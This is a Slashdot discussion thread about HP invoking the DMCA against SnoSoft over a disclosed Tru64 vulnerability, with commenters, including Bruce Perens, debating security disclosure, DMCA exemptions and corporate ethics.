HP Uses DMCA To Quash Vulnerability Publication

Several readers wrote to note the fact that HP has evidently threatened to use the DMCA and computer crime laws against SnoSoft who have found a security flaw in Tru64. The quote from the HP VP is that the accused "could be fined up to $500,000 and imprisoned for up to five years."

Bruce Perens

[BoyPlankton]

So this is the real reason HP didn't want Bruce Perens to demonstrate against the DMCA?

Re:Bruce Perens

[laserjet]

Lexmark and Canon are solid competitors. Samsung is also a newcomer to the field. There are many other options than HP.

Re:Bruce Perens

[Bruce+Perens]

I don't know, but I am not happy to hear this at all. And if it's true, I'll take them to task for it. This is the first I've heard of the whole thing.

Bruce

Re:Bruce Perens

[Bruce+Perens]

By the way, my phone is 510-526-1165, if you feel the need to talk about this. I leave that line off the hook when I don't want calls, but it's available most of the day.

Bruce

Re:Bruce Perens

[Bruce+Perens]

I just woke up my boss and am in email correspondence with various other people. Obviously, a lot of the people involved are going to be unavailable until tomorrow morning.

My terms of employment with HP allow me to publicly criticise the company when necessary. I'd rather help them fix the problem so that the criticism is all in the past tense, but the criticism will come if necessary. All I have to go on tonight is news reports.

Thanks

Bruce

Re:Bruce Perens

Posting your phone number on /. - damn, I guess you do need that wheelbarrow !

Re:Bruce Perens

[laserjet]

Yes, I know this. Canon does not make all the engines, however. I know which models have Canon engines and which do not.

I always thought it was funny that HP bought their engines from a competitor. Without Canon, many of their products would not exist.

HP does write the firmware for their printers, however. I do not consider that a good thing based on recent experiences.

Re:Bruce Perens

[Shanep]

What's a good laser printer that has cheap toner/drum replacements?

How hard does this printer need to work? I purchased a Xerox P8ex about a year ago, which is just a little 600dpi (true) 8ppm laser. The cart you get with it is only half full of toner, but I got almost 3000 A4 pages out of it.

It has never jammed once either.

Cost me less than $400 Australian and I recently purchased a 5000 page toner cart for $220 Australian.

It's a nice little unit that is NOT one of those God awful WinPrinters, so it interprets PCL5 and 6 with an onboard StrongARM CPU motherboard that can be upgraded to 36MB via an older style SIMM socket. It does parallel and USB and works in Linux really nicely or under any other OS as a HP4 PCL printer.

It's not often that I rave about a product and I think this little printer is great. Cheap, fast enough, and excellent quality output. It has pseudo 1200dpi which only serves to make either the text or the vector graphics look worse, so ignore the 1200dpi hype thats placed on this printer and switch that off in the driver. 600dpi is very sharp anyway and on this printer its a real 600 dots-as-in-pixels per inch and not a fake dots-as-in-dithered-spots-of-colour which bubble/ink jet makers use to artifically make their printers sound far better than they actually are.

Re:Bruce Perens

[Bruce+Perens]

People really resist the phone. Lots will reply to me here. A few will email. None will call. No kidding. That number has been on my web page for a year, and the calls I get are from the press, and the occassional Nigerian money-laundering scam.

Bruce

Re:Bruce Perens

[Skapare]

The phone number for HP's chief legal counsel would be better. Get it. Use it.

Re:Bruce Perens

[0xA]

Bruce,

I plan to call you tomorrow and follow this up with an email but I imagine both your inbox and telephone line are going to be jammed tomorrow so I will post as well. These are my comments on the situation and my reaction as a customer.

I have been working with Compaq and HP systems my entire career, Intel based servers, UNIX servers and workstations, printer and software. Working as a retail reseller, VAR and customer I have recommended the purchase of HP and Compaq systems many times in the past and am now in a position to have final authority on what systems are purchased for my company. Our entire infrastructure is based on HP and Compaq products.

As a customer I must trust my vendors to act quickly and responsibly to give me the tools and information I need to keep my systems secure. Timely, complete vulnerability information and patches are critical to my success here. There is no framework, process or authority that provides for the responsible publication of this information, given the nature of many of the parties involved I doubt there can ever be a comprehensive solution. When a third party (outside of vendor and customer) finds a problem with a piece of software and decides to act irresponsibly the situation gets complicated, the Apache Foundation's problems last month are an example of this. From the news reports on news.com today I believe HP currently finds itself in a similar situation. The information I have been able to find does not paint SnoSoft or their member "Phased" in a good light, I suspect that the group has acted in bad faith or at least "Phased" has acted irresponsibly in the matter. I do not pass judgment on HP's actions in producing a solution for this problem.

However the comments of Kent Ferson as reported on news.com concern me greatly. By threatening the use of the DMCA or any other criminal statute in this matter, Mr. Ferson has turned the security community on it's head. HP's position as a market leader could go a long way to setting this as a precedent in the industry and law, the results of which could be devastating. While I recognize the importance of a group like SnoSoft working with a vendor to coordinate their disclosure with a vendor's fix, this also has to happen in an efficient manner. The chances are good that SnoSoft has discovered a problem that others know about or are explioting can not be ignored. The potential harm that can come from using criminal charges to frustrate or slow this process is hard to express. The responsibility for ensuring my company's systems are secure is mine, I must have the information I need to make responsible decisions on security. If this means removing systems from service until I can secure them then that is what I will do.

Regardless of the events leading to Mr. Ferson's letter to SnoSoft HP must clarify their position on this situation. I would hope that you are willing to state that provided no illegal methods were used to discover the vulnerability HP will not pursue criminal prosecution of researchers. If SnoSoft or Phased has acted in bad faith or breech of contract it is a matter for civil courts.

Aaron Schneider
Manager, Information Technology
Fabutan Sun Tan Studios
Schneider@fabutan.com

Re:Bruce Perens

[Alioth]

You're damned straight there.

I hate the damned phone. I just don't like to call strangers (I'm fine about calling friends). I have this "calling strangers phobia". It's so bad I won't even call mail-order lines if they have a website where I can do the ordering.

I think many geeks share this particular phone-fear.

Having said that, I have been getting better recently. If I still lived in the States, I might have got as far as lifting the receiver, and dialing your number before putting the phone down just as I was going to dial the last digit. As a therapy, I finally bought a cellphone, and I'm using it to help overcome my fear of calling strangers on the phone.

The trouble with the cellphone is that I end up texting people instead of actually phoning them, so I'm not sure how effective it'll be...

Re:Bruce Perens

[zerocool^]

Lexmark and Canon are solid competitors. Samsung is also a newcomer to the field. There are many other options than HP.


Absolutely. The next time I need a high quality enterprise server running a 64 bit Unix based OS for my company, and for some reason we decide to move away from Solaris, I plan to reccomend to my boss that we check out the servers from Lexmark and Cannon.

HP makes more than printers.

~Will

Re:Bruce Perens

[jc42]

> People really resist the phone. Lots will reply to me here. A few will email. None will call.

To a great extent, this is intentional. One of the real benefits of email and posting replies is that you can stare at your text on the screen, rewrite, check facts, reword, and only hit the Send button when you think you've got it right. Granted, not everyone does this, but many (possibly most) of us do.

Also, a phone call can easily get lost in the shuffle. A text message sits there until someone deletes it. You can come back to it an hour or a year later. You can toss it into bins and count the pro/con messages. You can grep through your messages looking for keywords.

I can't see any reason for techies to ever use the phone for issues like this. Posted and emailed replies are so superior.

Phone calls and face time make sense for communicating with suits. They don't make sense in technical discussions. This is a lot of why Open Source development has been so outpacing corporate software lately. The corporate model has people in a room or on the phone. The Open Source model has everyone communicating via email and mailing lists. The latter is orders of magnitude more effective at getting ideas across without loss or misunderstanding.

Re:Bruce Perens

[WNight]

Canon. They aren't part of this crap in the industry of preventing refills by using a chip that monitors ink levels. They also do seperate ink tanks for all the colors, something that saves a ton of money even if you buy all your ink from them. (I do, I wouldn't ever buy a printer whose ink tanks I couldn't refill, but I'm too lazy to actually do it for the $10 difference.)

And for servers, Sun and SGI. Or, if you don't need hot-swap CPUs, try clusters of commodity boxes. (And do proper rollover, which essentially (by letting you unplug a cluster member without any problems) gives you hotswap CPU capability.)

Re:Bruce Perens

[laserjet]

Jesus Christ. Read the parent to whom I replied to. He asked for competitors of hp's PRINTERS. Please remove your head from your anus.

Apache

[vex24]

Funny how when Apache had a hole released before they had a chance to fix it, they gave off a muted air of annoyance and fur that had been rubbed the wrong way.

Very mature compared to what big business does. "Wahh wahhh wahh!!! Help us Uncle Sam, we're poor defenseless transnational corporations!" Buncha whiners.

Re:Apache

[gmack]

Look at the diffrence though .. Xforce didn't wait before releasing a patch that failed to fix the problem along with an advisory that didn't grasp the full scope of the bug they found.

These guys waited a YEAR and HP still hadn't fixed the problem.

Who's laughing at Alan Cox now?

[rodgerd]

When Alan Cox originally discussed the notion that companies would (mis)use the DMCA in the security field, he was widely attacked for being silly.

Anyone still feel like laughing?

Re:Who's laughing at Alan Cox now?

[new500]

. . .

Well, if I'd known Alan Cox was going to make such risky and suggestive public comments I'd have slapped him with a DMCA suit of my own so as to shut him up : Charge - accessory to Large Corporations in a conspiracy to violate the security and integrity of my systems and networks, copyright materials and trade secrets by method of concealment of tangible Risk Evaluation Information perpetrated by speaking aloud about the one evil use of this act that once said was too obviously juicy for the Corps not to use. :-)

I wonder if I could use the DMCA to sue HP or whoever for abetting and encouraging black - hat hackers, and effectively concealing from me the information and tools required to defend myself . . . only partially joking, i'm afraid . .

Re:Who's laughing at Alan Cox now?

[Rohan427]

I actually submitted to LKML - on 8/1/2001 - that the DMCA could be used in this manner, and I also submitted several posts regarding other warnings about other laws. I hate to say I told you/them so, but I did:

[SNIP of e-mail quote I replied to]
"It's very simple, and something like this is done all the time in the security industry
by people who not only enjoy it, but who get paid to do it.

1) Discover an exploit or a new way of using a known exploit.
2) Write a trojan, virus, worm, etc. that takes advantage of the exploit.
3)* Report the exploit to the applicable compan(y/ies), Security Focus, etc. and provide
the BINARY of your trojan, virus, or whatever so they can test the
exploit and find a fix.

* Usually people provide the source code as open software. In this case (for this
argument) we release it as binary only and keep full rights.

No law was broken when the trojan, virus, etc. was written and no one can (technically)
seek prosecution. Under DMCA (at least the way the writers of it have
used it), anyone attempting to reverse engineer your virus (or whatever) and provide an
antigen, is liable to you and you can sue them.

To take another angle, those of us who actively look for exploits in software (because
companies like M$ fail to do so themselves) risk being sued for doing so.
This makes jobs like mine EXTREMELY difficult because on the one hand I don't want my
company using software that will allow Joe Cracker to take over our
machines, and on the other I don't want the company sued just because I did some
necessary reverse engineering in order to prevent it (again, because the
software mfg. can't be trusted to do it themselves).

PGA

--
Paul G. Allen
UNIX Admin II/Programmer
Akamai Technologies, Inc.
www.akamai.com
Work: xxx-xxx-xxxx
Cell: xxx-xxx-xxxx"

(Note: I no longer work for the above referenced company as my office was closed late last year. My statements and views are mine alone and do not, nor ever have, represented the views of Akamai Technologies, Inc. or any of it's officers and/or representatives.)

So, what do _I_ get for my warnings to the kernel developers? Blackballed from the list by the maintainer, in a rather rude fashion IMO. (despite the fact that I've received many a thank you for the information I had provided)

So, to all those who have read, heard, and seen such warnings, wherever you've read, seen, or heard them, and were asked to take action and do not, I say stop whining, shut up, and suffer. The same thing I tell people who don't vote - if you can't do your part to fight the problem, you have no right to bitch and moan about it.

My solution to many of these issues is not to support the companies promoting them. I no longer buy CDs, DVDs, or go to movies (yes, I will be missing the second in the LotR series - which I have long awaited.) I do not buy Compaq, and will never buy another HP device. I do not buy M$ products or anoything that runs on M$ platforms either. I have written letters to congress critters, etc. as well.

How many others can say they've actually done their part to fight the DMCA, US Patriot Act, CDBTPA, etc. and/or whatever equivalent laws you may have in your own countries?

I for one wish more folks in Alan's position would speak up. I commend him for doing his part, and he's not even a US citizen, is he?

I for one never did laugh at him.

PGA

Re:Who's laughing at Alan Cox now?

[God!+Awful]

Maybe we should wait to see if they win the case before concluding that the DMCA will allow companies to suppress security flaws. It doesn't sound like they have a legal leg to stand on. If SnoSoft doesn't pursue the case, no doubt the EFF will.

Also, releasing hacking tools without giving the company a chance to fix the problem still needs to be illegal under some other law or another. The details in this article were pretty vague. There was some vague allegation that they had known about the bug for a year, but there was nothing to suggest that they had a) informed HP about it or b) given HP a moratorium of "fix it by X date or we're going to release the exploit".

Also, the fact that the "researcher" is named "Phased" kind of makes you wonder about the legitimacy of this "research" group.

-a

Re:Who's laughing at Alan Cox now?

[rodgerd]

The DMCA allows immediate sanctions (the take down provisions), regardless of the findings of any puny court of law. It also has such massive penalties that it is unlikely that many people will want to even risk being the next Dimitri.

This is what legal types refer to as a chilling effect; many laws are deliberately written this way in order to promote self-censorship.

Re:Who's laughing at Alan Cox now?

[God!+Awful]

The chilling effect argument is fine and all, except that it's also an argument for never ever passing any new laws. New legislation is always a bit vague and it usually takes a few test cases to set the legal bounds. That's the risk you take when you do something that is borderline legal, as Elcomsoft did. This case is much different because it is HP that is pushing the boundaries and their claim seems pretty baseless. Big companies had the power of intimidation before the DMCA and they'll still have it tomorrow. It doesn't matter whether the claim has merit, only how much money the litigants have. Hell, I'd be freaked out if a big company threatened to sue me for $1,000,000 for not mowing my lawn.

-a

Re:Who's laughing at Alan Cox now?

[rodgerd]

It's not an argument for never passing any laws - it's an argument for passing well thought out, well written laws which don't leave absurd room for interpretation; you'll notice that in the US, for example, the easiest way to get a law which is constitutionally questionable shot down is for it to be considered "overly broad".

In the case of the DMCA, the subversion of due process which allows sanctions to be effected simply as the result of an accusing party claiming harm is a perfect example.

In a tolerably responsible legislature, of course, lawmakers would make sure their laws were framed so as to have the effect desired without causing unnecessary problems. But since the DMCA is basically lobby-driven law, the fact that it's over broad and overreaching is probably the intention of a bought-and-paid-for legislature.

Re:Who's laughing at Alan Cox now?

[God!+Awful]

Everyone on Slashdot likes to call the DMCA a bought-and-paid for law which proves that congress is corrupt, but I am less cynical than that. These are the same people who believe that copyright is evil and ought to be abolished. That is a view that is rather unique to this crowd. Is it possible that congress simply wants to pass a law that will help to protect copyright.

"Cease and desist" letters are a standard part of copyright law. It is too much of a burden on the court system (and copyright holder) for them to go to court to get an injunction everytime they sense a violation. Therefore, the law requires them to attempt to resolve the dispute out of court first. You may consider that a chilling effect, but it is only a chilling effect when one party has the intimidation factor of a large war chest.

I don't know what you mean about "sanctions being effected simply as the result of an accusing party claiming harm". You can request that the offending material be removed, but you can't collect any monetary sanctions without going to court. All you can do is threaten to sue, and you can only do that effectively if the accused party thinks they might lose. If they are 100% confident of winning, they might as well go to court and collect the fine for the nuisance suit.

As I said, I don't believe the DMCA applies here. HP is trying to use an overly broad interpretation of the statute to twist it into something else, and if they go to court they will probably lose.

-a

Re:Who's laughing at Alan Cox now?

[Rohan427]

Just to show that I put my money where my mouth is, and the possibilty that from leading by example others will follow, here's the letter I wrote to the HP CEO (it may never actually get read, and may get ignored, but at least I tried :)

"First of all, I'd like to say that my product experience with HP and Compaq products has varied. Over all, Compaq products leave a lot to be desired, and though I like and used to recommend HP printers and other peripherals to clients, their reliance upon specific Microsoft software for installation is rather maddening.

Recently it has come to my attention that HP is in some fashion using the DMCA to suppress the reporting of valid security holes in some of its software. As a computer and security professional of over 24 years, I must say that this policy, as well as the DMCA itself, is severely flawed. A customer has a right to know what they are purchasing and in this case they have the right to know if their data is secure. They also have the right to make certain it is secure by any means possible. As a company providing important software (and hardware) to customers, not the least of which are large corporations, you have an obligation to see to it that the software and hardware you sell them is secure, to the best of your abilities. This obligation must not be thrown aside in a pitiful attempt to protect IP rights (or whatever HP is attempting to protect) and put your customers at risk.

In addition, this type of stance will only hurt HP in the long run, and make HP more of a target for hate and discontent in the PC market. Because of this announcement, I have removed HP from my list of recommended companies and products, as I'm sure many others will as well.

The DMCA should never have been allowed to pass, as it has only come to hurt the digital industry worldwide, including the portions that large corporations such as yours bank upon. To date, the DMCA and other such laws governing digital media have only been used to suppress the rights of certain individuals, hamper innovation, and slow technological advances to a crawl. In the future, such poorly thought out laws will further damage the industry and assist in the decline of the US and worldwide economy.

Companies that support these types of laws are not helping themselves, but only hurting themselves. After all, even large corporations such as HP are consumers and must, in the end, abide by the same laws as the consumer.

I urge you to take the correct and responsible stance of supporting public knowledge of security flaws and fixing any and all those that your products may have. By suppressing such information, you only put your customers at greater risk because by doing so only those who wish to do harm with the information will have it. Those who wish to help secure systems will not, and those that are subject to the attacks will lose billions in lost time and data. As a security professional formerly with a large corporation, I was constantly under the gun to keep our systems secure. If not for the information freely available to me through public venues, my job would have been an impossible one. My company had over 11,000 systems on public networks. Every one of these had to be secure from crackers (also known as a "malicious hacker", which is the REAL term for the media word "hacker"). It was the responsibility of an entire team of people to keep track of current security holes and make sure they were fixed on ALL systems before the crackers could use them. In many cases, the exploits were never reported to us by the software mfg., but by someone unrelated party when they posted the exploit to a public web site. In some cases where we actually found the exploit, and reported them to the mfg., we were ignored until we were forced to report it to the public. Once we had reported it, it did nothing for the companies in question but cause hate and distrust from their customers.

So you see, you can't have your cake and eat it too. You either must take the responsibility for your product up front and honestly, or reap the consequences of your inaction and attempts at hiding (or whatever it is) later. I often feel that lawyers need to be kept out of technological discussions as most of them have no clue in the area. I would be willing to bet, and in fact I have seen evidence of this, that the reason most laws such as the DMCA are passed are due to the number of people in and out of congress who really know nothing about technology. it is the responsibility of those of us who are in the know, to educate those who are not as to what should be done and why. Unfortunately, most of us are either not in a high enough position (e.g. - the CEO of a large corporation) to make our voices heard, don't care to take the responsibility (and instead sit around and bitch about stupid laws), or are in a position to make a statement but have a specific stake in the passage of said laws.

I would also urge you to take a stance against all such repressive laws regarding technology. Yes, there are legitimate concerns of copyright infringement, piracy, etc., but there are already laws to deal with these issues. There is also something called "fair use", which includes the right to reverse engineer for educational purposes, edification, personal use, and to innovate. We need to see that these laws are enforced properly, and get away from treating the digital realm as if it is of a completely different universe.

It is a small minority in the digital world that actually steal copyrighted material, and if the suppressive laws continue to roll, that minority will quickly become a majority. Most that actually steal only do it because they are priced right out of the precious markets that the large corporations are trying so hard to protect. As if making several billion a year is not enough, the prices for such products MUST be raised and we MUST be forced to pay for every second of their use.

PGA
--
Paul G. Allen
Owner, Sr. Engineer, Security Specialist
Random Logic/Dream Park
www.randomlogic.com"

PGA

Re:Who's laughing at Alan Cox now?

[muffen]

Under DMCA (at least the way the writers of it have used it), anyone attempting to reverse engineer your virus (or whatever) and provide an antigen, is liable to you and you can sue them.

I believe you are wrong. Working for an antivirus company, I am certain I remember a clause in the DMCA that says that malware is allowed to be reverse engineered. If this was not the case, I would be breaking the DMCA on a daily basis.

Re:Who's laughing at Alan Cox now?

[mpe]

New legislation is always a bit vague and it usually takes a few test cases to set the legal bounds.

Only if the legislators have failed to do their job properly. When they do this new laws will be clear, non redundant and only passed when actually necessary.

It doesn't matter whether the claim has merit, only how much money the litigants have. Hell, I'd be freaked out if a big company threatened to sue me for $1,000,000 for not mowing my lawn.

The difference is that lawyers and judges would probably require a lot more convincing that 1 million dollers was a sensible figure when it came to lawn mowing than anything involving computers.

Re:Who's laughing at Alan Cox now?

[Rohan427]

Upon quickly reviewing the DMCA again, I have found that HP probably has no case whatsoever. The DMCA specifically allows Security Testing and information publication.

Section 1201(c) states that the DMCA does not circumvent Fair Use.
Section 1201(f) allows Reverse Engineering.
Section 1201(g) allows Encryption Research.
Section 1201(j) allows for Security Testing

Several sections allow publishing information.

I see no references to exceptions for viruses, trojans, worms, etc. written for the purposes of testing and exposing security flaws. In fact, such software seems to be PROTECTED under the DMCA.

So, I say to HP and all others trying to use the DMCA in this fashion: KMA!!

Even though the DMCA does NOT prohibit reverse engineering of anything, it has been INTERPRETED in just that way. There are three types of law: the written law, the interpreted law, and case law. To date, the DMCA has not really been used to protect against illegal use of copyrighted material. Instead it has been used to prohibit perfectly legal use of material. As written, the DMCA doesn't prohibit Fair Use and reverse engineering under existing law. As INTERPRETED, at least to date, it does.

This is one big problem with laws such as this. It's not necessarily the written law that's bad, it's the way it's interpreted. Some laws are written so vague that once argued in court, there is a chance that a judge (or jury) will interpret the law incorrectly. This then leads to case law which is later used in support of further rulings on the incorrectly interpreted written law. Some laws are purposefully written poorly so as to make it easily passed and then interpreted to mean something different, or something skewed, from what those who passed it were thinking.

Often laws are used against those who lack the understanding of said law, and used in a venue that may also lack such understanding, in order to dupe the defendant into submission. I've had this tried on me many times (and most people who've ever gotten a traffic ticket, gone to a family court in CA, or have had to deal with other courts) have as well. I am one who does not take even what my own lawyer has to say for granted. I am one who wants to see the text of the law, all references, and who does his own research.

IANAL, but I am educated and know how to read quite well, and I've spent enough time in court and with lawyers to have done some research into the law as a whole. I've also read the DMCA and copyright law. Apparently (IMHO) either someone at HP hasn't, or they're hoping others haven't.

PGA
--
Paul G. Allen
Owner, Sr. Engineer, Security Specialist
Random Logic/Dream Park
www.randomlogic.com

Re:Who's laughing at Alan Cox now?

[Alan+Cox]

> I no longer buy CDs,

Thats a shame. There is a lot of great music on independant labels who have a really good attitude to their fans. They don't hide lyric sheets, they often waive some radio fees and in many cases they work through local recording studios and cd firms helping them to survive and support local music.

I don't know about the USA but the UK has many relatively independant and completely independant small labels (eg www.showofhands.co.uk - a band whose musicians who actually go around teaching people to play their music, www.madrarua.com (ok Im biased they are in Swansea)). When I visited St Johns newfoundland I was amazed at the huge mostly independant and deeply vibrant music culture there.

Re:Who's laughing at Alan Cox now?

[afidel]

Actually the DMCA IS a bought and paid for law, do you think that any congressmen or their staffers pen'd any significant portion of this law? The answer would be no, the lawyers and lobbiest for the media companies wrote the law and left it as vague as they thought they could get away with so as to allow them a big hammer for hitting the evil pirates who would make "perfect digital copies" of their precious works of entertainment. I do not believe that the concept of copyright or any of the other intellectual property protection mechanisms is bad, but I do believe that current implementations are bad, with the DMCA being the worst example.

p.s.
Did you know that almost noone alive to day has seen anything created during their life enter the public domain? Thanks to Disney's uberlust to make sure steamboat willy and other classic films do not enter the public domain we now have a copyright term that is effectivly unending, do I think that a film or other work should be protected long enough for studios to have an oportunity to recoup their expenses and make some profit, sure I do. Do I think they should be allowed to never give up their state granted monopoly and live up to the other part of the bargin (that being that they have to give their work to the commons), no definitly not.

FUCK HP

Here's another fucking BIG CORP trying to strongarm to get there way.

Fuck HP. IT's like Ford trying to get the safety concerns of the Pinto hushed up.

Consumers are in danger, and WE COME FIRST.

Meanwhile.....

[shoemakc]

Halfway around the world, Bill Gates breathes a long sigh of relief as Microsoft's profitability is assured well into the next century...

-Chris

If they sue and lose, it helps.

[fishbowl]

If suits like this go to trial, and don't result in huge gains for the plaintiff, the caselaw will tend to discourage others. In some ways that would be better than a repeal.

An Excellent Quote

[unsinged+int]

Finisterre said that while he wanted to resolve the dispute with HP, he resented receiving DMCA threats. "We are like the guys that found out that Firestone tires have issues on Ford explorers," he said. "It's not our fault your Explorer has crap tires. We just pointed it out. We should not get attacked for pointing out issues in someone's product nor for proving it is possible."

When will people learn this is the same thing?

Re:An Excellent Quote

[rodgerd]

Why, when the media conglomerates who lobbied for this bill use the newspapers (they own), TV new and documentaries (they own) and radio shows (they own) to explain to people why the DMCA is such a bad idea, and what the negative ramifications of it are.

I'm sure the congressmen (they own) will also take a responsible line, and won't conflate these kinds of issues with actual breaches of copyright, terrorism, or other acts most people consider unacceptable.

Re:An Excellent Quote

[richieb]

Some people might argue, that by publicizing a security hole, more people will try to take advantage of that hole, and will compromise security for anyone using the product.

So, to carry the Ford Explorer analogy, they should've stayed quiet until the manufacturer recalled all the tires?

HP had a year to deal with this! WHy don't they hire some programmers, instead of lawyers.

Re:An Excellent Quote

[silentbozo]

It can also be argued that by publicizing the tire defect, the media exposed Ford to a ton of lawsuits by lawsuit-happy lawyers. If they had only shut up until Ford had covered up the problem, Ford wouldn't have had to spend all that money trying to whitewash their image, laying blame on Firestone, and quietly paying off the families of those killed in firestone/ford related accidents.

Obviously this argument is pure bullshit, and so is the argument that publicizing security holes encourages more people to exploit them. Of course it does - BUT THAT'S NOT THE POINT. The point is to FIX THE PROBLEM so nobody else has to suffer for it! If it takes lawsuits against manufacturers of defective products, or active exploits to illustrate how much of a threat a weakness is, then that's what it has to take!

This is rediculous!

[SunCrushr]

Finding and publishing a security hole in an OS is not a way to circumvent copyright protection.
If I take over somebody's True64 machine via this security hole, I haven't broken copyright at all.
Now, if I take documents off of the server, then I may be breaking copyright, but I don't think the connection is strong enough to stand up in a court of law.
I could hold up a book store with a gun and make them give me their books. I've stolen the books and therefore broken copyright. Does that mean we should ban guns since they are a possible copyright protection circumvention device?

Re:This is rediculous!

[quantum+bit]

I could hold up a book store with a gun and make them give me their books. I've stolen the books and therefore broken copyright.

Um, no, you're commited armed robbery and theft of property. Stealing books doesn't violate any copyright laws. Now if you then go to a Xerox machine and start making unauthorized copies, then you'd be infringing copyright.

Does that mean we should ban guns since they are a possible copyright protection circumvention device?

No, but apparently we should ban Xerox machines.

Re:This is rediculous!

[Fjord]

That's silly. Xerox machines are analog copying devices. It's digital ones that are bad.

not entirely serious. not entirely joking.

Bruce, it's time for you to make a decision

[JoeBuck]

It was legitimate for you to cooperate with HP's valid concern that, as a "deep pockets" organization it would be too risky for them to let you challenge the DMCA. I understood that.

But now it appears that you work for a company that is using the DMCA as a club to suppress discussion of security flaws. It doesn't seem that the two hats you wear (your HP role and your open source leadership role) are compatible unless you can persuade HP to back off.

It is possible, of course, that the DMCA threat is coming from one manager who is shooting his mouth off. If so, we need a clarification from higher management: is it the policy of HP to use the DMCA to suppress discussion of their security flaws, or not?

Re:Bruce, it's time for you to make a decision

[clark625]

This seems a little hypocritical, sure, but I don't think it is unacceptable. Yeah, it's perhaps somewhat unethical. And yeah, I wish they wouldn't do things like this.

But let's consider this from another stance: HP is a large corporation and they do have a duty to their shareholders. Letting Bruce (or any other employee) clearly violate any federal law (whether constitutional or otherwise) isn't something the shareholders would want. I hate the DMCA, too, and I'm sure that HP doesn't much want it, either. But they can't just violate the law without expectation of legal suit--and the owners aren't gonna like that.

That said, why can't HP use the DMCA against itself? This type of thing is exactly why most of us think the DMCA is so terrible. In a way, I think this is a good thing. If HP uses this stupid law to brow-beat enough people "because they can" and "because it's good for shareholders", then the sooner we can get stupid laws repealed. I'm not against that.

I realize that this isn't a popular opinion here on /., but it's only karma. I just wish people would stop believing that any company exists for any reason other than to increase the wealth of its shareholders. Sorry folks, this is just the American way.

Re:Bruce, it's time for you to make a decision

[crawling_chaos]

I just wish people would stop believing that any company exists for any reason other than to increase the wealth of its shareholders. Sorry folks, this is just the American way.

I don't think it's HP, the Company, that the parent post is addressed to. It's addressed to Bruce Perens, the Man. It's time for him to make a statement, one way or the other. I'd be very interested in what he has to say about this, and I'm reserving judgement until he does speak, or allows a long enough period of silence to speak for him.

Sorry, it's just the human way.

Re:Bruce, it's time for you to make a decision

[Glytch]

Newsflash: The American Way is a crock of shit. It's a Bad Thing. It doesn't work. Tu comprende? It destroys lives, and turns citizens into serfs, trying to make just enough money to send their yearly tithe to the monarch and not starve.

And the stock market is a crock of shit too. "Duty to shareholders". Fuck that. I'd rather buy from private companies, utterly dependant on pleasing their customers, without the useless distraction of some arbitrary share price.

Re:Bruce, it's time for you to make a decision

[TellarHK]

I suspect Bruce won't be able to reply here for legal reasons (though he maybe able, we'll see) but he's definitely reading, I think we can all guess that. HPaq is going to be increasingly difficult to work with in the future, by any guess I think I can make. They're bigger, they're badder, more bloated, and they're aiming at a much more demanding and volatile market so any "advantage" they can use to squash appearance of failure or flaw is going to be rapidly pounced upon before they suffer the fate of any large star that runs out of power. The DMCA is just today's big stick. Will they bring out a bigger one later?

Does this cause Bruce to reconsider his employer? Only Bruce knows. Does this cause us to want him to make a statement by resigning or taking some other action? I suspect so. But I don't want to see the community pushing him toward a decision that isn't in his best interests. I think we just need to sit back and wait, to see what happens next.

Re:Bruce, it's time for you to make a decision

[gilroy]

Blocxkquoth the poster:

I just wish people would stop believing that any company exists for any reason other than to increase the wealth of its shareholders.

I just wish people would stop believing that any company exists for the sole reason of increasing the wealth of its shareholders. It used to be that people believed in ethics -- that there are societal responsibilities that compete with shareholder equity. Of course it used to be that the primary purpose of a company was to produce something, which something would hopefully allow a profit.

You know it is possible -- and ethical! -- to not do something because it goes too far. Or is HP obligated to murder someone if it increases shareholder profit? And before you say, "Well, the law imposes too high a cost", answer me this: What if you could prove the legal sanction was less than the profit realized? Should HP kill the person? Must they?

Re:Bruce, it's time for you to make a decision

[ChaosDiscord]

I just wish people would stop believing that any company exists for any reason other than to increase the wealth of its shareholders. Sorry folks, this is just the American way.

The American way is the right to Life, Liberty, and the pursuit of Happiness. The American way is that no law shall abridge free of speech or of the press.

"The only law shalt be maximixe your stock price at all costs" is part of something worse. It isn't even part of the Capitalist way, for true capitalism only works with wide availability of information and strong competition. This is the inbred freak son of Capitalism and Greed. The is the way of life of scam artists, shysters, hucksters, thieves. This is the Monopolist's Way.

I understand perfectly well that "thou shalt increase your stock price or face lawsuits," but I don't have to like it. It's a corruption of everything America, freedom, and true capitalism. I have every right to name it beast and call for it to be cast into the fires.

Re:Bruce, it's time for you to make a decision

[Bruce+Perens]

I just heard of this for the first time, so give me some time to speak with the people involved.

Bruce

Re:Bruce, it's time for you to make a decision

[rodgerd]

Companies actually exist to fulfill their charter. Which may or may not make profit maximisation their primary goal (non-profits don't, for example).

Since the charter is granted soley at the discretion of society (as represented through government agencies), corporations ought to be careful about what they do...

Re:Bruce, it's time for you to make a decision

[elmegil]

Bruce,

I just want to say that I an 100% behind your request for time instead of having to answer to a horde of mad slashdot zealots wielding pitchforks when you've had no time to investigate. Not all of us here are so quick to assume the worst.

Good luck in your discussions with the PHB's that be.

Re:Bruce, it's time for you to make a decision

[Jah-Wren+Ryel]

This whole "deep pockets" excuse is just a lot of bullshit. "Deep Pockets" are for when some idiot gets drunk at work, falls off the loading dock and sues his employer for $2M. "Deep Pockets" are not about one multinational corp suing another multinational corp. In fact, such suits are what they do best.

If HP had any gonads left after Carly's last couple of years, they would have stood up and told Bruce to go ahead and break the DMCA on company time so that their entire legal department could kick some ass instead of cowering in the corner.

Of course the real reason they told Bruce to hold back wasn't any legal fears, they just are afraid of pissing off Hollywood and other potential customers. Morality doesn't mean beans when there is a buck to be made, even for the once honorable HP...

Re:Bruce, it's time for you to make a decision

[medcalf]

Actually, it's not so much monopoly as the divine right of kings. Monopolies were originally granted by monarchs to exploit a given opportunity to the profit of the monopoly and the monarch without that pesky competition getting in the way. What now seems to be the case is that corporations in many cases want to grant themselves monopoly powers, by buying legislators to get the law amended in their favor. The amazing thing is that with all that is going on, we are not marching in the streets and exacting mob justice on the legislators and the corporations that buy them. Note that I am a fairly free-market capitalist, which is one of the reasons I am so angered when companies trash the system for their own short-term profit. True capitalism benefits everyone, not just the heads of corporations.

Re:Bruce, it's time for you to make a decision

[Malcontent]

You have to remember that most of the pro business people on this board are MS employees. They automatically assume every business is run like MS. They presume that every corporation is unethical as theirs. I guess they would have to assume that otherwise they would lose a lot of sleep.

Re:Bruce, it's time for you to make a decision

[Bruce+Perens]

Well, my job is keeping the company from doing stuff that makes its customers want to "vote with their wallet" as you do, or fixing the problem when that goes wrong. Give me some chance to do it.

Bruce

Re:Bruce, it's time for you to make a decision

[Bruce+Perens]

